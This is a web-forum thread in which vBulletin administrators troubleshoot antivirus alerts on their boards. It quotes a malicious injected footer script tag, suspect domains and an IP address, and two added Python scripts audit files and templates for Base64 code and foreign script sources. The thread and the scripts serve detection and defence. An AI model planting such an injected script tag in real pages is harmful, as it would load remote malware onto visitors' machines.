
Forums triggering virus alerts

  • Forums triggering virus alerts

    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I can not find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?

  • #2
    Originally posted by Wardsweb
    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I can not find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?
    Boy, I've been getting this as well. Of course, everyone assumes it's our board that's doing it, but we're on a dedicated server and I've just checked it again.

    Posted this on our site, any thoughts from anyone would be welcome.

    Comment


    • #3
      Can you try re-downloading the ZIP file from the Members Area and re-upload all files (except install/install.php and includes/config.php.new) making sure you overwrite all files currently on your server.

      Does this resolve the problem?
      Vote for:

      - *Admin Settable Paid Subscription Reminder Timeframe*
      - *PM - Add ability to reply to originator only*
      - Add Admin ability to auto-subscribe users to specific channel(s)
      - Highlight the correct navigation tab when you are on a custom page
      - "Quick Route" Interface...
      - Allow to use custom icons for individual forums

      Comment


      • #4
        While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.

        Comment


        • #5
          Originally posted by Wardsweb
          While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.
          You shouldn't have a problem with following Trevor's suggestion unless you have modified vBulletin core files. If you haven't, then nothing that you have done to your forum mods, templates, CSS or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else that's stored.

          I know because I have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and I mean everything!
          Kind regards,
          Simon
          Microsoft Office Discussion

          Comment


          • #6
            Hi,

            Sounds like you have an iframe sql injection. It can be in your templates, but not always - it varies.

            Checking your source code may or may not find it either. Download Developer Tools for Firefox - then check Generated Source Code, this will show up any hidden source code that you normally will not see. Once you find which template it is, just hit Save on that template and it will remove any injected code.

            Re-uploading all vBulletin core files will not always correct this problem if the person has hidden 'backdoor' files in your vBulletin, in which case check your Suspect Files for Base64 coding, or additional encoded JavaScript files, all of which will 'kill' your forum eventually.

            Leaving 'backdoor' files in vBulletin or any script will not stop a malicious attack even if you are running the latest vBulletin with all patches. Blocking IPs in your .htaccess file will just cause your forum to respond slower after a while, since each IP will be checked before allowing access.

            Regards,

            Comment
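The check suggested in posts #3, #5 and #6 (compare the live files with a clean download, then read anything extra or altered for Base64 content), as an added example that is not part of any post in this thread. It assumes a clean copy of the same vBulletin version unpacked next to the live tree; the file name `cache_helper.php` and all file contents are constructed.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic for the "Base64 coding" mentioned in post #6. A hit means
# "read this file by hand", not "this file is malicious".
ENCODED = re.compile(rb"base64_decode\s*\(|[A-Za-z0-9+/]{200,}={0,2}")

def digests(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def audit(clean_root, live_root, skip=("includes/config.php",)):
    """Report files the clean download lacks, files that differ, and encoded hits."""
    clean_root, live_root = Path(clean_root), Path(live_root)
    clean, live = digests(clean_root), digests(live_root)
    extra = sorted(f for f in live if f not in clean and f not in skip)
    changed = sorted(f for f in live if f in clean and live[f] != clean[f])
    encoded = sorted(f for f in extra + changed
                     if ENCODED.search((live_root / f).read_bytes()))
    return {"extra": extra, "changed": changed, "encoded": encoded}

def demo():
    """Constructed trees: one stock file, the site's own config, one planted extra file."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "includes").mkdir(parents=True)
            (root / "includes" / "functions.php").write_text("<?php // stock file\n")
        (live / "includes" / "config.php").write_text("<?php // site settings\n")
        # Hypothetical extra file with inert, constructed content.
        (live / "includes" / "cache_helper.php").write_text(
            '<?php $p = base64_decode("Y29uc3RydWN0ZWQ="); // constructed placeholder\n')
        return audit(clean, live)

if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

Installed modifications will also appear under `extra`, so each entry needs to be matched against what the administrator knowingly installed.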


            • #7
              A lot of forums suddenly started having issues yesterday. Our users suddenly have to hit their "back" button multiple times to move back one page. Seems that MS IE users are complaining exclusively. But I'm not positive. My users have pointed out issues with some file called www.alltagcloud.info/icons/index.html. I network with a couple of dozen other VB forum admins, they started seeing this yesterday as well. They are thinking it's some Adsense ad possibly.
              Last edited by creativepart; Sun 18th Dec '11, 3:10pm.

              Comment


              • #8
                We found it on our system. Look for this code:
                Code:
                <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                We found it in the Footer -- right after the
                Code:
                <form action="$vboptions[forumhome].php" method="get">

                Comment


                • #9
                  Originally posted by creativepart
                  We found it on our system. Look for this code:
                  Code:
                  <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                  We found it in the Footer -- right after the
                  Code:
                  <form action="$vboptions[forumhome].php" method="get">
                  Thanks - I looked but did not find it.

                  Comment


                  • #10
                    Many members have referenced the Toolkit and this IP address 178.17.163.189. The domain name may change but the IP is the same. Even with this IP set 178.17.163. in the .htaccess, some are still getting hit.

                    Even the hosting company is trying to find where this is being launched to no avail.

                    Comment


                    • #11
                      We have a few members grumbling about this as well, but thus far I haven't been able to find a thing. I've even tried accessing the site from inside a VM with virgin XP and 7 installs and no protection of any kind hoping to get some kind of infection, but haven't managed to infect myself.

                      I did look and couldn't find any reference to www.pageviewapi.com anywhere.
                      Host for ShopFloorTalk.com

                      Comment


                      • #12
                        When we had this issue I downloaded and installed Fiddler2 on my desktop computer. This little free program runs in a separate window and lists every file, function and script called while your page loads. I couldn't "see" any problems on my site until I loaded this and watched a page load. That's when I started seeing some script at alltagcloud.info loading with each page load. And, since Fiddler2 shows everything loading in order I could see that the script was being called near or in the footer which narrowed down the search. We were surprised to find the script was actually named something different than alltagcloud.info and I'd guess they have multiple versions of this with different names. Initially something named "pageviewapi.com" sounding fairly normal for the standard VB footer code.

                        You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.

                        Comment
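The search described in posts #8 and #12, as an added example that is not part of any post in this thread: because the injected script may appear under changing names, it lists every script or frame source in the template text and flags hosts outside an allowlist instead of looking for one known domain. The allowlist and the sample templates are constructed; only the pageviewapi.com tag is taken from post #8.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only hosts this forum's templates should load code from.
ALLOWED_HOSTS = {"forum.example", "ajax.googleapis.com"}

# Constructed sample templates; the injected tag is the one quoted in post #8.
TEMPLATES = {
    "header": '<script type="text/javascript" src="clientscript/vbulletin_menu.js"></script>\n'
              '<iframe src="//cdn.forum.example/banner.html"></iframe>\n',
    "footer": '<form action="$vboptions[forumhome].php" method="get">\n'
              '<script type="text/javascript" '
              'src="http://www.pageviewapi.com/icons/icons.php"></script>\n'
              '</form>\n',
}

class RefFinder(HTMLParser):
    """Collects (tag, url, line) for every element that pulls in active content."""
    WATCHED = {"script": "src", "iframe": "src", "frame": "src",
               "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        url = dict(attrs).get(self.WATCHED.get(tag, ""))
        if url:
            self.refs.append((tag, url, self.getpos()[0]))

def is_allowed(url, allowed=ALLOWED_HOSTS):
    host = (urlparse(url).hostname or "").lower()
    # No host means a relative URL, i.e. a file served by the forum itself.
    return host == "" or any(host == a or host.endswith("." + a) for a in allowed)

def find_foreign_refs(templates, allowed=ALLOWED_HOSTS):
    findings = []
    for name in sorted(templates):
        finder = RefFinder()
        finder.feed(templates[name])
        finder.close()
        findings += [(name, tag, urlparse(url).hostname, line)
                     for tag, url, line in finder.refs if not is_allowed(url, allowed)]
    return findings

if __name__ == "__main__":
    for name, tag, host, line in find_foreign_refs(TEMPLATES):
        print(f"{name}:{line}: <{tag}> loads from {host}")
```

The same function can be run over the HTML a browser actually received, which also covers tags that come from posts, signatures or ad code and not from a template.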


                        • #13
                          Originally posted by Simon Lloyd
                          You shouldn't have a problem with following Trevor's suggestion unless you have modified vBulletin core files. If you haven't, then nothing that you have done to your forum mods, templates, CSS or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else that's stored.

                          I know because I have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and I mean everything!
                          We are on a dedicated server, so I had the server company replace all the templates from a backup. We back up the site daily and used one from 30 days ago to retrieve the files. Still there are a couple of posts after the reinstall of people being hit. Whatever it is, it is very nasty, taking over their computers to the point of having to reformat or reinstall from a cloned drive or backup.

                          Comment


                          • #14
                            Originally posted by creativepart
                            You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.
                            Been playing around with the forum with Fiddler2 and have yet to find anything. Could it be that these guys got infected somewhere else and it gets triggered when they visit a VB site?
                            Host for ShopFloorTalk.com

                            Comment


                            • #15
                              Our forum has been dealing with this since December 11. We have had 25-30 people over 16 days report issues. We are a mid-sized board with 20,000+ uniques per day. Out of 20k uniques per day, 1 or 2 of them report either getting a virus, or having their virus software notify them that a virus was blocked. That is .005% of our unique visitors reporting issues. Of course all of them claim it only happens when they visit our website.

                              We run on dedicated servers which have been checked, rechecked and then checked again. We have compared our files with the maintenance tools as well as our templates. I have had a group of people running Fiddler2 for days and none of us has seen anything.

                              I would love to figure this one out. I would like to know why it only bothers a small fraction of my users.

                              Comment
